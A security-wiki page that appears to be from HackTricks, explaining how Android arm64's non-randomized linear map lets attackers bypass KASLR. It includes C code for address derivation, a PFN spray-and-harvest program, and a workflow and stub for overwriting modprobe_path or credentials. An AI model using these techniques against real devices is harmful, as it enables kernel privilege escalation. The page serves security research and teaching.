# Linux arm64 Static Linear Map KASLR Bypass

{{#include ../../banners/hacktricks-training.md}}

## Overview

Android kernels built for arm64 almost universally enable **`CONFIG_ARM64_VA_BITS=39`** (3-level paging) and **`CONFIG_MEMORY_HOTPLUG=y`**. With only 512 GiB of kernel virtual address space available, the Linux developers chose to anchor the **linear map** at the lowest possible kernel VA so that future hot-plugged RAM can simply extend the mapping upward. Since commit `1db780bafa4c`, arm64 no longer even attempts to randomize that placement, which means:

- `PAGE_OFFSET = 0xffffff8000000000` is compiled in.
- `PHYS_OFFSET` is sourced from the exported `memstart_addr`, which on stock Android devices is effectively constant (`0x80000000` today).

As a consequence, **every physical page has a deterministic linear-map virtual address that is independent of the KASLR slide**:

```c
#define phys_to_virt(p) (((unsigned long)(p) - 0x80000000UL) | 0xffffff8000000000UL)
```

If an attacker can learn or influence a physical address (kernel object, PFN from `/proc/self/pagemap`, or even a user-controlled page), they instantly know the corresponding kernel virtual address without leaking the randomized primary kernel mapping.
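
Because both constants are fixed, the transform and its inverse can be precomputed entirely in userspace. A minimal self-contained sketch, assuming the stock Android constants above (the sample physical address is only an illustration):

```c
#include <stdint.h>
#include <stdio.h>

#define PHYS_OFFSET 0x80000000ULL          /* memstart_addr on stock devices */
#define PAGE_OFFSET 0xffffff8000000000ULL  /* CONFIG_ARM64_VA_BITS=39 linear map */

/* Static arm64 linear-map transform and its inverse. */
static uint64_t phys_to_virt(uint64_t phys) { return (phys - PHYS_OFFSET) | PAGE_OFFSET; }
static uint64_t virt_to_phys(uint64_t virt) { return (virt & ~PAGE_OFFSET) + PHYS_OFFSET; }

int main(void) {
    uint64_t phys = 0x81ff2398ULL;       /* illustrative physical address */
    uint64_t virt = phys_to_virt(phys);  /* -> 0xffffff8001ff2398 */
    printf("phys 0x%llx -> virt 0x%llx -> phys 0x%llx\n",
           (unsigned long long)phys,
           (unsigned long long)virt,
           (unsigned long long)virt_to_phys(virt));
    return 0;
}
```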

## Reading `memstart_addr` and confirming the transform

`memstart_addr` is exported in `/proc/kallsyms` and can be read on rooted devices or via any arbitrary kernel-read primitive. Project Zero used Jann Horn's tracing-BPF helper (`bpf_arb_read`) to dump it directly:

```bash
grep memstart /proc/kallsyms
# ... yields the virtual address of memstart_addr
./bpf_arb_read <addr_of_memstart_addr> 8
```

The little-endian bytes `00 00 00 80 00 00 00 00` confirm `memstart_addr = 0x80000000`. Once `PAGE_OFFSET` and `PHYS_OFFSET` are pinned, the arm64 linear map is a static affine transform of any physical address.

## Deriving stable `.data` addresses on devices with a fixed kernel physbase

Many Pixels still decompress the kernel at **`phys_kernel_base = 0x80010000`** on every boot (visible in `/proc/iomem`). Combining that with the static transform yields cross-reboot-stable addresses for any data symbol, as the sketch after this list shows:

1. Record the randomized kernel virtual address of `_stext` and of your target symbol from `/proc/kallsyms` (or from the exact `vmlinux`).
2. Compute the offset: `offset = sym_virt - _stext_virt`.
3. Add the static boot-time physbase: `phys_sym = 0x80010000 + offset`.
4. Convert to a linear-map VA: `virt_sym = phys_to_virt(phys_sym)`.

Example (`modprobe_path` on a Pixel 9): `offset = 0x1fe2398`, `phys = 0x81ff2398`, `virt = 0xffffff8001ff2398`. After multiple reboots, `bpf_arb_read 0xffffff8001ff2398` returns the same bytes, so exploit payloads can treat `0xffffff8000010000` as a synthetic, non-randomized base for all `.data` offsets.
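
A minimal sketch of that derivation, assuming the Pixel constants above. The two `kallsyms` values are hypothetical placeholders you would replace with reads from the target device; with the placeholders chosen here the output reproduces the `modprobe_path` example:

```c
#include <stdint.h>
#include <stdio.h>

#define PHYS_KERNEL_BASE 0x80010000ULL          /* static decompression base (/proc/iomem) */
#define PHYS_OFFSET      0x80000000ULL          /* memstart_addr */
#define PAGE_OFFSET      0xffffff8000000000ULL  /* 39-bit VA linear map */

static uint64_t phys_to_virt(uint64_t phys) {
    return (phys - PHYS_OFFSET) | PAGE_OFFSET;
}

int main(void) {
    /* Hypothetical randomized values read from /proc/kallsyms on the target. */
    uint64_t stext_virt = 0xffffffd2a1210000ULL;
    uint64_t sym_virt   = 0xffffffd2a31f2398ULL;  /* e.g. modprobe_path */

    uint64_t offset   = sym_virt - stext_virt;    /* KASLR slide cancels out */
    uint64_t phys_sym = PHYS_KERNEL_BASE + offset;

    /* With the values above: offset 0x1fe2398 -> VA 0xffffff8001ff2398 */
    printf("stable linear-map VA: 0x%llx\n",
           (unsigned long long)phys_to_virt(phys_sym));
    return 0;
}
```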

This mapping is **RW**, so any primitive that can place attacker data in kernel virtual space (double free, UAF, out-of-bounds heap write, etc.) can patch credentials, LSM hooks, or dispatch tables without ever leaking the true KASLR slide. The only limitation is that `.text` is mapped non-executable in the linear map, so gadget hunting still requires a traditional leak.

## PFN spraying when the kernel physbase is randomized

Vendors such as Samsung randomize the kernel load PFN, but the static linear map is still abusable because PFN allocation is not fully random:

1. **Spray user pages**: `mmap()` ~5 GiB and touch every page to fault it in.
2. **Harvest PFNs**: read `/proc/self/pagemap` for each page (or use another PFN leak) to collect the backing PFN list.
3. **Repeat and profile**: reboot, rerun 100×, and build a histogram of how often each PFN was attacker-controlled. Some PFNs are white-hot (allocated 100/100 times shortly after boot).
4. **Convert PFN → kernel VA**:
   - `phys = (pfn << PAGE_SHIFT) + offset_in_page`
   - `virt = phys_to_virt(phys)`
5. **Forge kernel objects in those pages** and steer victim pointers (UAF, overflow, etc.) to the known linear-map addresses.

Because the linear map is identity-mapped RW memory, this technique lets you place fully attacker-controlled data at deterministic kernel VAs even when the real kernel base moves. Exploits can prebuild fake `file_operations`, `cred`, or refcount structures inside the sprayed pages and then pivot existing kernel pointers into them. A minimal spray-and-harvest sketch follows.
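
One caveat: since Linux 4.0, unprivileged reads of `/proc/self/pagemap` return zeroed PFNs, so on a hardened target you would swap the `pagemap` read for your own PFN-leak primitive. The spray size below is scaled down from the ~5 GiB used in the original research to keep the sketch light:

```c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

#define PAGE_SHIFT  12
#define SPRAY_BYTES (512UL << 20)   /* 512 MiB sketch; scale up for real profiling */

int main(void) {
    uint8_t *spray = mmap(NULL, SPRAY_BYTES, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (spray == MAP_FAILED) { perror("mmap"); return 1; }

    /* Fault every page in so each one acquires a physical backing. */
    for (size_t off = 0; off < SPRAY_BYTES; off += 1UL << PAGE_SHIFT)
        spray[off] = 0x41;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) { perror("open pagemap"); return 1; }

    for (size_t off = 0; off < SPRAY_BYTES; off += 1UL << PAGE_SHIFT) {
        uint64_t entry;
        uint64_t vpn = ((uintptr_t)spray + off) >> PAGE_SHIFT;
        if (pread(fd, &entry, sizeof(entry), vpn * sizeof(entry)) != sizeof(entry))
            break;
        if (!(entry & (1ULL << 63)))            /* bit 63: page present */
            continue;
        uint64_t pfn = entry & ((1ULL << 55) - 1); /* bits 0-54: PFN */
        if (pfn == 0)                           /* zeroed without CAP_SYS_ADMIN */
            continue;
        uint64_t phys = pfn << PAGE_SHIFT;
        uint64_t virt = (phys - 0x80000000ULL) | 0xffffff8000000000ULL;
        printf("user %p -> pfn 0x%llx -> kernel VA 0x%llx\n",
               (void *)(spray + off), (unsigned long long)pfn,
               (unsigned long long)virt);
    }
    close(fd);
    return 0;
}
```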

## Practical workflow for arm64 Android exploits

1. **Info gathering**
   - Root the device or use a kernel-read primitive to dump `memstart_addr`, `_stext`, and the target symbol from `/proc/kallsyms`.
   - On Pixels, trust the static physbase from `/proc/iomem`; on other devices, prepare the PFN profiler.
2. **Address calculation**
   - Apply the offset math above and cache the resulting linear-map VAs in your exploit.
   - For PFN spraying, keep a list of "reliable" PFNs that repeatedly land in attacker memory.
3. **Exploit integration**
   - When an arbitrary write is available, directly patch targets such as `modprobe_path`, `init_cred`, or security-ops arrays at the precomputed addresses (see the sketch after this list).
   - When only a heap corruption exists, craft fake objects in the sprayed pages whose PFNs are known and repoint victim pointers to those linear-map VAs.
4. **Verification**
   - Use `bpf_arb_read` or any safe read primitive to sanity-check that the computed address contains the expected bytes before destructive writes.

This workflow eliminates the KASLR-leak stage for data-centric kernel exploits on Android, which drastically lowers exploit complexity and improves reliability.
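
For step 3, the write itself is a one-shot once the VA is precomputed. A dry-run sketch with a stubbed primitive: `kwrite` here is a hypothetical stand-in for whatever UAF- or overflow-based arbitrary write the exploit actually provides, and the address is the Pixel 9 example from above:

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stub: replace the body with the exploit's real arbitrary kernel write. */
static void kwrite(uint64_t kaddr, const void *buf, size_t len) {
    printf("[dry run] would write %zu bytes at 0x%llx\n",
           len, (unsigned long long)kaddr);
}

int main(void) {
    /* Pixel 9 example from the text; recompute per target build. */
    const uint64_t modprobe_path_va = 0xffffff8001ff2398ULL;
    const char payload[] = "/data/local/tmp/x";  /* attacker-owned helper binary */

    /* Sanity-check the address with a read primitive first (step 4). */
    kwrite(modprobe_path_va, payload, sizeof(payload));
    return 0;
}
```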

## References

- [Project Zero - Defeating arm64 Linux KASLR by Exploiting the Static Linear Map and Kernel Physical Placement on Android](https://projectzero.google/2025/11/defeating-kaslr-by-doing-nothing-at-all.html)

{{#include ../../banners/hacktricks-training.md}}